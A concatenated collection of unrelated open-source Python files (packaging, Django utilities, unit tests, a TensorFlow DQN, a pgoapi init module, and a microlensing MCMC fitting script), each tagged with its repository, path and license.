name='spyder-vim',
version=get_version(),
packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
keywords=['Spyder', 'Plugin', 'Vim'],
url='https://github.com/spyder-ide/spyder-vim',
license='MIT',
author='Joseph Martinot-Lagarde',
author_email='contrebasse@gmail.com',
description='A plugin to enable vim keybindings in the Spyder editor',
long_description=get_description(),
install_requires=REQUIREMENTS,
include_package_data=True,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: X11 Applications :: Qt',
'Environment :: Win32 (MS Windows)',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Software Development :: Widget Sets'])
|
Nodd/spyderplugins.vim
|
setup.py
|
Python
|
mit
| 2,136
|
#Finish the solution so that it sorts the passed in array of numbers. If the function is passed an empty array or null/nil value then it should return an empty array.
def solution(nums):
return sorted(nums) if nums else []
#Alternate Solution
def solution(nums):
if not nums:
return []
return sorted(nums)
|
JLJTECH/TutorialTesting
|
CodeWars/2016/SortNumbers-7k.py
|
Python
|
mit
| 326
|
import rethinkdb as r
from tornado import gen
from tornado import ioloop
import random
r.set_loop_type("tornado")
connection = r.connect(host='localhost', port=28015)
|
peymanmortazavi/quantifiedSelf
|
lib/database.py
|
Python
|
mit
| 168
|
# -*- coding: utf-8 -*-
import datetime
import requests
from pytz import timezone
from django.conf import settings
def get_tz(geoid):
if settings.USE_LOCAL_GEOBASE:
return settings.DB.regionById(int(geoid)).as_dict['tzname']
try:
return requests.get(settings.GEOBASE_API,
params={'id': geoid},
headers={"Authorization": "anytask"}
).json()['tzname']
except: # noqa
return settings.TIME_ZONE
def convert_datetime(date_time, from_time_zone, to_time_zone=settings.TIME_ZONE):
return timezone(from_time_zone).localize(date_time.replace(tzinfo=None)).\
astimezone(timezone(to_time_zone))
def get_datetime_with_tz(value, geoid, user):
value = datetime.datetime.strptime(value, '%d-%m-%Y %H:%M')
if geoid:
tz = get_tz(geoid)
else:
tz = user.profile.time_zone or settings.TIME_ZONE
return convert_datetime(value, tz)
|
znick/anytask
|
anytask/common/timezone.py
|
Python
|
mit
| 981
|
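convert_datetime() above localizes a naive datetime in the source zone and then shifts it to the target zone; the same operation spelled out directly with pytz (zone names are illustrative):

```python
import datetime
from pytz import timezone

naive = datetime.datetime(2020, 3, 1, 12, 0)              # naive wall-clock time
localized = timezone('Europe/Moscow').localize(naive)     # attach the source zone
print(localized.astimezone(timezone('UTC')))              # 2020-03-01 09:00:00+00:00 (Moscow is UTC+3)
```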
import sys
import os
brief = "test a model"
aliases = ['m']
def usage(argv0):
print("Usage: {} test model MODEL_NAME|--list|--help".format(argv0))
sys.exit(1)
alias = ['m']
def execute(argv, argv0, engine):
if not argv or '--help' in argv:
usage(argv0)
os.environ["AIOWEB_ENV"] = "test"
environment = os.getenv("AIOWEB_ENV", "development")
os.environ.setdefault("AIOWEB_SETTINGS_MODULE", "settings")
import lib
from aioweb import settings
tests_dir = lib.dirs(settings, format=["tests_models"], check=True)
if not tests_dir:
print("No model found!")
sys.exit(0)
if '--list' in argv:
[print(m[:-3]) for m in os.listdir(tests_dir) if m.endswith(".py") and not m.startswith("__")]
sys.exit(0)
test_file = os.path.join(tests_dir, lib.names(argv[0] + ".py", format=["model"]))
if not os.path.exists(test_file):
print("No such file: " + test_file)
sys.exit(1)
os.system("python3 " + test_file)
|
kreopt/aioweb
|
wyrm/modules/test/model.py
|
Python
|
mit
| 1,012
|
import mock
import subprocess
from linkins import script
from linkins.test import util
@mock.patch('multiprocessing.Process')
@mock.patch('linkins.script.log')
@mock.patch('subprocess.Popen')
def test_runscript_simple(fakepopen, fakelog, fakeprocess):
proc = fakepopen.return_value
poll = proc.poll
poll.return_value = 0
read = proc.stdout.read
read.side_effect = iter('foo\n')
script.runscript('/foo/bar')
popen = util.mock_call_with_name(
'',
['/foo/bar'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
)
read = mock.call().stdout.read(1)
reads = [read]*5
close = mock.call().stdout.close()
out_log = util.mock_call_with_name(
'info',
'foo',
extra={'source': 'SCRIPT', 'script': 'bar'},
)
popen_calls = [
popen,
]
popen_calls += reads
popen_calls.append(close)
log_calls = [
out_log,
]
assert fakepopen.mock_calls == popen_calls
assert fakelog.mock_calls == log_calls
assert fakeprocess.mock_calls == []
@mock.patch('multiprocessing.Process')
@mock.patch('linkins.script.log')
@mock.patch('subprocess.Popen')
def test_runscript_args(fakepopen, fakelog, fakeprocess):
proc = fakepopen.return_value
poll = proc.poll
poll.return_value = 0
read = proc.stdout.read
read.side_effect = iter('')
script.runscript('/foo/bar', 'fee', 'fi', 'fo')
popen = util.mock_call_with_name(
'',
['/foo/bar', 'fee', 'fi', 'fo'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
)
read = mock.call().stdout.read(1)
close = mock.call().stdout.close()
popen_calls = [
popen,
read,
close,
]
assert fakepopen.mock_calls == popen_calls
assert fakelog.mock_calls == []
assert fakeprocess.mock_calls == []
@mock.patch('multiprocessing.Process')
@mock.patch('linkins.script.log')
@mock.patch('subprocess.Popen')
def test_runscript_name(fakepopen, fakelog, fakeprocess):
proc = fakepopen.return_value
poll = proc.poll
poll.return_value = 0
read = proc.stdout.read
read.side_effect = iter('foo\n')
script.runscript('/foo/bar', name='foo-name')
popen = util.mock_call_with_name(
'',
['/foo/bar'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
)
read = mock.call().stdout.read(1)
reads = [read]*5
close = mock.call().stdout.close()
out_log = util.mock_call_with_name(
'info',
'foo',
extra={'source': 'SCRIPT', 'script': 'foo-name'},
)
popen_calls = [
popen,
]
popen_calls += reads
popen_calls.append(close)
log_calls = [
out_log,
]
assert fakepopen.mock_calls == popen_calls
assert fakelog.mock_calls == log_calls
assert fakeprocess.mock_calls == []
@mock.patch('multiprocessing.Process')
@mock.patch('linkins.script.log')
@mock.patch('subprocess.Popen')
def test_runscript_multiprocess(fakepopen, fakelog, fakeprocess):
script.runscript('/foo/bar', multiprocess=True)
assert fakepopen.mock_calls == []
assert fakelog.mock_calls == []
process = mock.call(
target=script._run,
args=(['/foo/bar'], 'bar'),
)
start = mock.call().start()
calls = [
process,
start,
]
assert fakeprocess.mock_calls == calls
@mock.patch('multiprocessing.Process')
@mock.patch('linkins.script.log')
@mock.patch('subprocess.Popen')
def test_runscript_while_loop(fakepopen, fakelog, fakeprocess):
proc = fakepopen.return_value
poll = proc.poll
poll.side_effect = [None, 0, 0]
read = proc.stdout.read
def forever():
yield 'f'
yield '\n'
yield ''
yield ''
raise AssertionError('Looping forever')
read.side_effect = forever()
script.runscript('/foo/bar')
popen = util.mock_call_with_name(
'',
['/foo/bar'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
)
popen_calls = [
popen,
]
read = mock.call().stdout.read(1)
reads = [read]*3
popen_calls += reads
poll = mock.call().poll()
polls = [poll]*2
popen_calls += polls
popen_calls += [
mock.call().stdout.read(1),
mock.call().poll(),
]
close = mock.call().stdout.close()
popen_calls.append(close)
f_log = util.mock_call_with_name(
'info',
'f',
extra={'source': 'SCRIPT', 'script': 'bar'},
)
empty_log = util.mock_call_with_name(
'info',
'',
extra={'source': 'SCRIPT', 'script': 'bar'},
)
log_calls = [
f_log,
empty_log,
]
assert fakepopen.mock_calls == popen_calls
assert fakelog.mock_calls == log_calls
assert fakeprocess.mock_calls == []
|
thelinuxkid/linkins
|
linkins/test/test_script.py
|
Python
|
mit
| 4,969
|
#!/usr/bin/env python
""" Assignment 1, Exercise 3, INF1340, Fall, 2015. Troubleshooting Car Issues.
This module contains one function diagnose_car(). It is an expert system to
interactively diagnose car issues.
"""
__author__ = 'Susan Sim'
__email__ = "ses@drsusansim.org"
__copyright__ = "2015 Susan Sim"
__license__ = "MIT License"
def diagnose_car():
"""
Interactively queries the user with yes/no questions to identify a
possible issue with a car.
Inputs: Y or N
Expected Outputs: Display successive diagnostic questions until a final solution is provided
Errors: Any other entry besides Y and N will result in an error
Test Case:
#Input:Y
#Expected Output: Display Are the battery terminals corroded? (Y/N):
#Input:YY
#Expected Output: Display Clean terminals and try starting again.
#Input:YN
#Expected Output: Display Replace cables and try again.
#Input:N
#Expected Output: Display Does the car make a clicking noise? (Y/N):
#Input:NY
#Expected Output: Display Replace the battery.
#Input:NN
#Expected Output: Display Does the car crank up but fail to start? (Y/N):
#Input:NNY
#Expected Output: Display Check spark plug connections.
#Input:NNN
#Expected Output: Display Does the engine start and then die? (Y/N):
#Input:NNNY
#Expected Output: Display Does your car have fuel injection? (Y/N):
#Input:NNNYN
#Expected Output: Display Check to ensure the choke is opening and closing.
#Input:NNNYY
#Expected Output: Display Get it in for service.
#Input:NNNN
#Expected Output: Display Engine is not getting enough fuel. Clean fuel pump.
#Input: Anything other than Y and N
#Expected Output: Display Error: This answer is invalid. Only answer Y or N.
"""
user_input = raw_input('Is the car silent when you turn the key? (Y/N):')
if user_input == "Y":
user_input = raw_input('Are the battery terminals corroded? (Y/N):')
if user_input == "Y":
print('Clean terminals and try starting again.')
elif user_input == "N":
print('Replace cables and try again.')
elif user_input == "N":
user_input = raw_input('Does the car make a clicking noise? (Y/N):')
if user_input == "Y":
print('Replace the battery.')
elif user_input == "N":
user_input = raw_input('Does the car crank up but fail to start? (Y/N):')
if user_input == "Y":
print('Check spark plug connections.')
elif user_input == "N":
user_input = raw_input('Does the engine start and then die? (Y/N):')
if user_input == "Y":
user_input = raw_input('Does your car have fuel injection? (Y/N):')
if user_input == "N":
print('Check to ensure the choke is opening and closing.')
elif user_input == "Y":
print('Get it in for service.')
elif user_input == "N":
print('Engine is not getting enough fuel. Clean fuel pump.')
else:
print('Error: This answer is invalid. Only answer Y or N.')
#diagnose_car()
|
susanshen/inf1340_2015_asst1
|
exercise3.py
|
Python
|
mit
| 3,239
|
from django.contrib import admin
from Stations.models import Station, Sensor
class StationAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ('name',)}
class SensorAdmin(admin.ModelAdmin):
prepopulated_fields = {
'slug': ('sensor_type', 'height',),
}
# Register your models here.
admin.site.register(Station, StationAdmin)
admin.site.register(Sensor, SensorAdmin)
|
sschultz/FHSU-GSCI-Weather
|
Stations/admin.py
|
Python
|
mit
| 405
|
class DatabaseConnection(object):
HOST = 'databaseurl.com'
PORT = '5432'
USERNAME = 'test_user'
|
jjensenmike/python
|
import_constants/config.py
|
Python
|
mit
| 108
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri May 19 12:32:10 2017
@author: wd
"""
import math
import tensorflow as tf
import numpy as np
cnn = np.load('/home/wd/Workspace/RL/dqn_cnn.npy')
# w3, w4, cnn,
class DQN:
def __init__(self, sess, weight, w1, w2, w3, cnn_eye, bias, input_size, output_size, name = 'main'):
self.sess = sess
self.weight = weight
self.cnn = cnn_eye
self.w1 = w1
self.w2 = w2
self.w3 = w3
self.bias = bias
self.input_size = input_size
self.output_size = output_size
self.filter_sizes = [5, 5, 7, 1]
self.net_name = name
self._build_network()
def _build_network(self, h_size=256, l_rate=1e-3):
with tf.variable_scope(self.net_name):
self._X = tf.placeholder(tf.float32, [None, self.input_size])
self._H = tf.placeholder(tf.float32, [None, 50])
self._Y = tf.placeholder(dtype = tf.float32)
self.x_tensor = tf.reshape(self._X, [-1, 28, 28, 1])
self.current_input = self.x_tensor
self.cnn_save = []
for layer_i, n_output in enumerate([64, 128, 256 , 512]):
n_input = self.current_input.get_shape().as_list()[3]
W = tf.Variable(
tf.random_uniform([
self.filter_sizes[layer_i],
self.filter_sizes[layer_i],
n_input, n_output],
-1.0 / math.sqrt(n_input),
1.0 / math.sqrt(n_input)), name = 'CNN')
b = tf.Variable(tf.zeros([n_output]))
if 2 > layer_i:
# batch_mean, batch_var = tf.nn.moments(tf.nn.conv2d(
# self.current_input, W, strides=[1, 2, 2, 1], padding='SAME'), [0,1,2])
# beta = tf.Variable(tf.constant(0.0, shape = [n_output]))
# gamma = tf.Variable(tf.constant(1.0, shape = [n_output]))
self.cnn_save.append(W)
self.output = tf.nn.relu(tf.nn.max_pool(
#
tf.add(tf.nn.conv2d(
self.current_input, W, strides=[1, 1, 1, 1], padding='SAME'), b), ksize=[1,2,2,1],\
strides=[1,2,2,1],padding='SAME'))
self.current_input = self.output
self.current_input = tf.nn.dropout(self.current_input, keep_prob = 0.7)
elif 2 <= layer_i:
# batch_mean, batch_var = tf.nn.moments(tf.nn.conv2d(
# self.current_input, W, strides=[1, 2, 2, 1], padding='VALID'), [0,1,2])
# beta = tf.Variable(tf.constant(0.0, shape = [n_output]))
# gamma = tf.Variable(tf.constant(1.0, shape = [n_output]))
self.cnn_save.append(W)
self.output = tf.nn.relu(
tf.add(tf.nn.conv2d(
self.current_input, W, strides=[1, 1, 1, 1], padding='VALID'), b))
self.current_input = self.output
self.current_input = tf.nn.dropout(self.current_input, keep_prob = 0.7)
self.current_input = tf.reshape(self.current_input, [-1, 512])
self.fc_input = tf.concat(1,[self.current_input, self._H])
#First layer of weights
self.W1 = tf.get_variable("W1", shape=[562, h_size],
initializer = tf.contrib.layers.xavier_initializer())
# layer1 = tf.nn.dropout(tf.nn.tanh(tf.matmul(self.fc_input, self.W1)), keep_prob =0.7)
layer1 = tf.nn.relu(tf.matmul(self.fc_input, self.W1))
#second layer of weights
self.W2 = tf.get_variable("W2", shape=[h_size, 5],
initializer = tf.contrib.layers.xavier_initializer())
self._Qpred = tf.nn.dropout(tf.matmul(layer1, self.W2), keep_prob = 0.7)
#We need to define the parts of the network needed for learning a policy
self.est_value = tf.squeeze(tf.nn.softmax(self._Qpred))
#Loss function
self._loss = tf.squared_difference(self.est_value, self._Y)
#Learning
self._train = tf.train.AdamOptimizer(
learning_rate=l_rate).minimize(self._loss)
def predict(self,state, history):
# x = np.reshape(self.get_processed_state(state), [None, 256])
x = np.reshape(state, [1,784])
# print(history)
# print (np.shape(np.asarray(history)))
h = np.reshape(np.asarray(history), [1, 50])
return self.sess.run(self.est_value, feed_dict = {self._X: x, self._H : h})
def update(self, x_stack, y_stack, h_stack):
return self.sess.run([self._loss, self._train], feed_dict={
self._X: x_stack, self._Y: y_stack, self._H: h_stack})
def save(self):
return self.sess.run(self.W3)
def save2(self):
return self.sess.run(self.W4)
def savecnn(self):
return self.sess.run(self.cnn_save)
def savecnn2(self):
return self.sess.run(self.cnn_2_save)
def save_w1(self):
return self.sess.run(self.W1)
def save_w2(self):
return self.sess.run(self.W2)
|
blackpigg/RL_landmark_finder
|
PG_value.py
|
Python
|
mit
| 5,462
|
"""
pgoapi - Pokemon Go API
Copyright (c) 2016 tjado <https://github.com/tejado>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
OR OTHER DEALINGS IN THE SOFTWARE.
Author: tjado <https://github.com/tejado>
"""
from __future__ import absolute_import
from pgoapi.exceptions import PleaseInstallProtobufVersion3
import pkg_resources
import logging
__title__ = 'pgoapi'
__version__ = '1.1.5'
__author__ = 'tjado'
__license__ = 'MIT License'
__copyright__ = 'Copyright (c) 2016 tjado <https://github.com/tejado>'
protobuf_exist = False
protobuf_version = 0
try:
protobuf_version = pkg_resources.get_distribution("protobuf").version
protobuf_exist = True
except:
pass
if (not protobuf_exist) or (int(protobuf_version[:1]) < 3):
raise PleaseInstallProtobufVersion3()
from pgoapi.pgoapi import PGoApi
from pgoapi.rpc_api import RpcApi
from pgoapi.auth import Auth
logging.getLogger("pgoapi").addHandler(logging.NullHandler())
logging.getLogger("rpc_api").addHandler(logging.NullHandler())
logging.getLogger("utilities").addHandler(logging.NullHandler())
logging.getLogger("auth").addHandler(logging.NullHandler())
logging.getLogger("auth_ptc").addHandler(logging.NullHandler())
logging.getLogger("auth_google").addHandler(logging.NullHandler())
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except:
pass
|
superfsm/pgoapi
|
pgoapi/__init__.py
|
Python
|
mit
| 2,311
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
__author__ = 'tchen'
logger = logging.getLogger(__name__)
from django.contrib.sites.models import Site
def site(request):
import karp
return {
'site': Site.objects.get_current(),
'version': karp.__version__,
}
|
tyrchen/karp
|
karp/context_processors.py
|
Python
|
mit
| 321
|
from unittest import TestCase
from tests.assertions import CustomAssertions
import numpy as np
from floq.helpers.matrix import is_unitary, adjoint, gram_schmidt, norm, product
class TestIsUnitary(TestCase):
def test_true_if_unitary(self):
u = np.array([[-0.288822 - 0.154483j, 0.20768 - 0.22441j, 0.0949032 - 0.0560178j, -0.385994 + 0.210021j, 0.423002 - 0.605778j, 0.135684 - 0.172261j], [0.0998628 - 0.364186j, 0.408817 - 0.35846j, -0.224508 - 0.550201j, 0.258427 + 0.263299j, -0.0297947 + 0.180679j, -0.0134853 + 0.197029j], [0.541087 - 0.216046j, -0.306777 + 0.0439077j, -0.479354 + 0.0395382j, -0.474755 + 0.264776j, -0.0971467 - 0.0167121j, 0.121192 - 0.115168j], [-0.0479833 - 0.133938j, 0.0696875 - 0.539678j, 0.314762 + 0.391157j, -0.376453 + 0.00569747j, -0.348676 + 0.2061j, 0.0588683 + 0.34972j], [-0.524482 + 0.213402j, 0.152127 + 0.111274j, -0.308402 - 0.134059j, -0.448647 + 0.120202j, -0.0680734 + 0.435883j, -0.295969 - 0.181141j], [-0.119405 + 0.235674j, 0.349453 + 0.247169j, -0.169971 + 0.0966179j, 0.0310919 + 0.129778j, -0.228356 + 0.00511762j, 0.793243 + 0.0977203j]])
self.assertTrue(is_unitary(u, 1e-5))
def test_false_if_not_unitary(self):
u = np.array([[-5.288822 - 0.154483j, 0.20768 - 0.22441j, 0.0949032 - 0.0560178j, -0.385994 + 0.210021j, 0.423002 - 0.605778j, 0.135684 - 0.172261j], [0.0998628 - 0.364186j, 0.408817 - 0.35846j, -0.224508 - 0.550201j, 0.258427 + 0.263299j, -0.0297947 + 0.180679j, -0.0134853 + 0.197029j], [0.541087 - 0.216046j, -0.306777 + 0.0439077j, -0.479354 + 0.0395382j, -0.474755 + 0.264776j, -0.0971467 - 0.0167121j, 0.121192 - 0.115168j], [-0.0479833 - 0.133938j, 0.0696875 - 0.539678j, 0.314762 + 0.391157j, -0.376453 + 0.00569747j, -0.348676 + 0.2061j, 0.0588683 + 0.34972j], [-0.524482 + 0.213402j, 0.152127 + 0.111274j, -0.308402 - 0.134059j, -0.448647 + 0.120202j, -0.0680734 + 0.435883j, -0.295969 - 0.181141j], [-0.119405 + 0.235674j, 0.349453 + 0.247169j, -0.169971 + 0.0966179j, 0.0310919 + 0.129778j, -0.228356 + 0.00511762j, 0.793243 + 0.0977203j]])
self.assertFalse(is_unitary(u))
class TestAdjoint(CustomAssertions):
def test_does_right_thing(self):
u = np.array([[2.3+12j, -13j+5], [1j+12.1, 0.3j+0.1]])
target = np.array([[2.3-12j, -1j+12.1], [+13j+5, -0.3j+0.1]])
self.assertArrayEqual(adjoint(u), target)
class TestGramSchmidt(CustomAssertions):
def setUp(self):
self.array = np.array([[1.0j, 2.0, 3.0],
[0.0+0.2j, 1.0, 1.0],
[3.0, 2.0, 1.0]])
self.res = gram_schmidt(self.array)
self.x = self.res[0]
self.y = self.res[1]
self.z = self.res[2]
def test_orthogonality_x_y(self):
self.assertAlmostEqual(product(self.x, self.y), 0.0)
def test_orthogonality_x_z(self):
self.assertAlmostEqual(product(self.x, self.z), 0.0)
def test_orthogonality_y_z(self):
print self.y
print self.z
self.assertAlmostEqual(product(self.y, self.z), 0.0)
def test_normalised_x(self):
self.assertAlmostEqual(norm(self.x), 1.0)
def test_normalised_y(self):
self.assertAlmostEqual(norm(self.y), 1.0)
def test_normalised_z(self):
self.assertAlmostEqual(norm(self.z), 1.0)
|
sirmarcel/floq
|
tests/helpers/test_matrix.py
|
Python
|
mit
| 3,297
|
from django.db import models
import hashlib
import time
import sys
def _createHash():
hash = hashlib.sha1()
hash.update(str(time.time()).encode('utf-8'))
return hash.hexdigest()[:10]  # keep within the 10-character hash field defined below
class Session(models.Model):
data = models.CharField(max_length=sys.maxsize)
hash = models.CharField(max_length=10,default=_createHash,unique=True)
|
martynvandijke/Stargazer
|
stargazer/simulator/models.py
|
Python
|
mit
| 355
|
import numpy as np
import pdb
from scipy.special import digamma
import logging
iter_num = 5
np.seterr(over='raise')
def exp_proportion(theta):
exp_theta = np.exp(theta)
return exp_theta / np.sum(exp_theta)
def update_variables(X, theta_1, theta_2, q_z, beta, labels, lbda, rho, u, it):
DOC_NUM, VOCAB_SIZE = X.shape
labeled = [x for x in range(DOC_NUM) if labels[x] != -1]
unlabeled = [x for x in range(DOC_NUM) if labels[x] == -1]
total = 0
for itt in range(iter_num):
logging.info("Updating topics; iter: %d" % itt)
new_beta = np.ones(beta.shape)
for x in labeled + unlabeled:
weight = 1 if labels[x] != -1 else 1
# update theta
#Ez = np.sum(q_z[x][w] * X[x, w] for w in q_z[x])
Ez = np.sum(tp[1] * tp[2] for tp in q_z[x])
pi = exp_proportion(theta_1[x])
#if labels[x] != -1 and it:
if labels[x] != -1:
theta_1[x] = (Ez - np.sum(Ez) * pi) / rho + theta_2[x] - u[x]
else:
theta_1[x] = (Ez - np.sum(Ez) * pi) * lbda
# update q_z
eta_hessian = np.asmatrix(pi).T * np.asmatrix(pi) - np.diag(pi)
#if labels[x] != -1 and it:
if labels[x] != -1:
Sigma = eta_hessian * np.sum(Ez) - rho
else:
Sigma = eta_hessian * np.sum(Ez) - 1 / lbda
Eq = theta_1[x] - np.log(np.sum(np.exp(theta_1[x]))) + 1 / 2 * np.trace(eta_hessian * Sigma)
for tp in q_z[x]:
qz = Eq + np.log(beta[:, tp[0]])
qz = np.exp(qz)
#q_z[x][w] = qz / np.sum(qz)
tp[2] = qz / np.sum(qz)
#new_beta[:, w] += q_z[x][w] * X[x, w]
new_beta[:, tp[0]] += weight * tp[1] * tp[2]
# update beta
new_beta /= np.sum(new_beta, axis=1)[:, np.newaxis]
logging.info(np.linalg.norm(new_beta - beta))
beta = new_beta
return theta_1, q_z, beta
def dtm_update(X, W, topic_num, theta, phi, it_num, dic):
DOC_NUM, VOCAB_SIZE = X.shape
gamma = 0.1
def Q(theta):
total = 0
for x in range(DOC_NUM):
'''
for y in range(VOCAB_SIZE):
'''
for y in dic[x]:
post = np.multiply(theta[x, :], phi[:, y])
post /= np.sum(post)
total += X[x, y] * np.dot(post, np.log(theta[x, :]) + np.log(phi[:, y]))
return total
def R(theta):
dist = np.zeros((DOC_NUM, DOC_NUM))
for x in range(DOC_NUM):
dist[x] = np.linalg.norm(theta[x] - theta, axis=1)**2
return np.sum(dist) / np.sum(np.multiply(W, dist))
for _ in range(it_num):
print _
new_phi = np.ones(phi.shape) * .01
for x in range(DOC_NUM):
'''
for y in range(VOCAB_SIZE):
'''
for y in dic[x]:
post = np.multiply(theta[x, :], phi[:, y])
post /= np.sum(post)
new_phi[:, y] += post * X[x, y]
new_phi /= np.sum(new_phi, axis=1)[:, np.newaxis]
phi = new_phi
theta_1 = np.copy(theta)
dist = np.zeros((DOC_NUM, DOC_NUM))
for x in range(DOC_NUM):
dist[x] = np.linalg.norm(theta[x] - theta, axis=1)**2
alpha = R(theta)
for k in range(topic_num):
for x in range(DOC_NUM):
beta = (DOC_NUM * theta_1[x, k] + alpha * np.dot(W[x, :], theta_1[:, k])) / (np.sum(theta_1[:, k]) + alpha * np.sum(W[x, :]) * theta_1[x, k])
if theta_1[x, k] > 0 and beta > 1 / theta_1[x, k]:
beta = 0.99 / theta_1[x, k]
'''
if beta * theta_1[x, k] == 1:
theta_1[x] = .01
theta_1[x, k] = 1 - .01 * (topic_num - 1)
'''
coef = (1 - beta * theta_1[x, k]) / (1 - theta_1[x, k])
theta_1[x] *= coef
theta_1[x, k] /= coef
theta_1[x, k] *= beta
if np.any(theta_1 <= 0):
theta_1 += .01
theta_1 /= np.sum(theta_1, axis=1)[:, np.newaxis]
Q1 = Q(theta)
Q2 = Q(theta_1)
if Q2 > Q1:
theta = theta_1
print Q2
else:
print "Q1 not improved"
theta_2 = np.ones(theta_1.shape) * .01
for x in range(DOC_NUM):
#for y in range(VOCAB_SIZE):
for y in dic[x]:
post = np.multiply(theta_1[x, :], phi[:, y])
post /= np.sum(post)
theta_2[x] += post * X[x, y]
theta_2 /= np.sum(theta_2, axis=1)[:, np.newaxis]
if np.any(theta_2 <= 0):
pdb.set_trace()
theta_3 = np.copy(theta_1)
s = 0.
while True:
print s
theta_3 += gamma * (theta_2 - theta_1)
s += gamma
Q1 = Q(theta_3)
Q2 = Q(theta)
if Q1 > Q2 and R(theta_3) > R(theta):
theta = theta_3
gamma = .1
print Q1
break
elif s >= 9 * gamma:
gamma /= 4
break
return theta, phi
|
wenchaodudu/SNLDA
|
lda.py
|
Python
|
mit
| 5,422
|
"""
High-level fitting and plotting example with MulensModel.
Requires in-line argument which is a config file, e.g.,
example_15_mb07192_v1.cfg or example_15_ob05390_v1.cfg.
"""
import os
import sys
import numpy as np
import emcee
from matplotlib import pyplot as plt
import configparser
import MulensModel as mm
import example_15_read as read
def ln_like(theta, event, parameters_to_fit, print_models):
"""
Likelihood function. The values of *parameters_to_fit* are in *theta*.
MulensModel Event class instance *event* gives event for which
calculations will be done. Boolean *print_models* controls if
all models are printed.
"""
for (theta_, param) in zip(theta, parameters_to_fit):
setattr(event.model.parameters, param, theta_)
chi2 = event.get_chi2()
if print_models:
print(chi2, *[t for t in theta], flush=True)
return -0.5 * chi2
def ln_prior(theta, parameters_to_fit):
"""
Prior. Check if *theta* values for *parameters_to_fit* are within ranges
defined by *ln_prior.min* and *ln_prior.max*.
"""
inside = 0.
outside = -np.inf
for (parameter, value) in ln_prior.min.items():
index = parameters_to_fit.index(parameter)
if theta[index] < value:
return outside
for (parameter, value) in ln_prior.max.items():
index = parameters_to_fit.index(parameter)
if theta[index] > value:
return outside
return inside
def ln_prob(
theta, event, parameters_to_fit, print_models=False):
"""
Log probability of the model - combines ln_prior() and ln_like().
"""
ln_prior_ = ln_prior(theta, parameters_to_fit)
if not np.isfinite(ln_prior_):
return -np.inf
ln_like_ = ln_like(theta, event, parameters_to_fit, print_models)
if np.isnan(ln_like_):
return -np.inf
return ln_prior_ + ln_like_
def generate_random_parameters(parameters, starting, n):
"""
Generate *n* vectors of values of *parameters* according to distributions
specified in *starting*.
"""
values = []
for param in parameters:
settings = starting[param]
if settings[0] == 'gauss':
v = settings[2] * np.random.randn(n)
v += settings[1]
elif settings[0] == 'uniform':
v = np.random.uniform(
low=settings[1], high=settings[2], size=n)
elif settings[0] == 'log-uniform':
beg = np.log(settings[1])
end = np.log(settings[2])
v = np.exp(np.random.uniform(beg, end, n))
else:
raise ValueError('Unrecognized keyword: ' + settings[0])
values.append(v)
return np.array(values).T.tolist()
# Read config file.
if len(sys.argv) != 2:
raise ValueError('Exactly one argument needed - cfg file')
config_file = sys.argv[1]
config = configparser.ConfigParser()
config.optionxform = str # So that "t_E" is not changed to "t_e".
config.read(config_file)
files = read.read_files_from_config(config)
model_settings = read.read_model_settings(config)
(parameters, starting) = read.read_parameters_start(config)
fixed_parameters = read.read_fix_parameters(config)
(min_values, max_values) = read.read_min_max(config)
ln_prior.min = min_values
ln_prior.max = max_values
emcee_settings = read.read_emcee_settings(config)
other_settings = read.read_other(config)
# Read photometric data.
datasets = [mm.MulensData(file_name=f[0], phot_fmt=f[1]) for f in files]
# Generate starting values of parameters.
start = generate_random_parameters(parameters, starting,
emcee_settings['n_walkers'])
# Setup Event instance that combines model and data.
par = dict(zip(parameters, start[0]))
par = {**par, **fixed_parameters}
my_model = mm.Model(par, coords=model_settings['coords'])
if 'methods' in model_settings:
my_model.set_magnification_methods(model_settings['methods'])
if 'default_method' in model_settings:
my_model.set_default_magnification_method(model_settings['default_method'])
my_event = mm.Event(datasets=datasets, model=my_model)
# Prepare sampler.
n_dim = len(parameters)
print_models = other_settings.get('print_models', False)
args = (my_event, parameters, print_models)
sampler = emcee.EnsembleSampler(emcee_settings['n_walkers'], n_dim, ln_prob,
args=args)
# Run sampler.
sampler.run_mcmc(start, emcee_settings['n_steps'])
# Parse results.
burn = emcee_settings['n_burn']
samples = sampler.chain[:, burn:, :].reshape((-1, n_dim))
r_16 = np.percentile(samples, 16, axis=0)
r_50 = np.percentile(samples, 50, axis=0)
r_84 = np.percentile(samples, 84, axis=0)
print("Fitted parameters:")
for i in range(n_dim):
if parameters[i] == 'q':
fmt = "{:} {:.7f} +{:.7f} -{:.7f}"
else:
fmt = "{:} {:.5f} +{:.5f} -{:.5f}"
print(fmt.format(parameters[i], r_50[i], r_84[i]-r_50[i], r_50[i]-r_16[i]))
# We extract best model parameters and chi2 from the chain:
prob = sampler.lnprobability[:, burn:].reshape((-1))
best_index = np.argmax(prob)
best_chi2 = prob[best_index] / -0.5
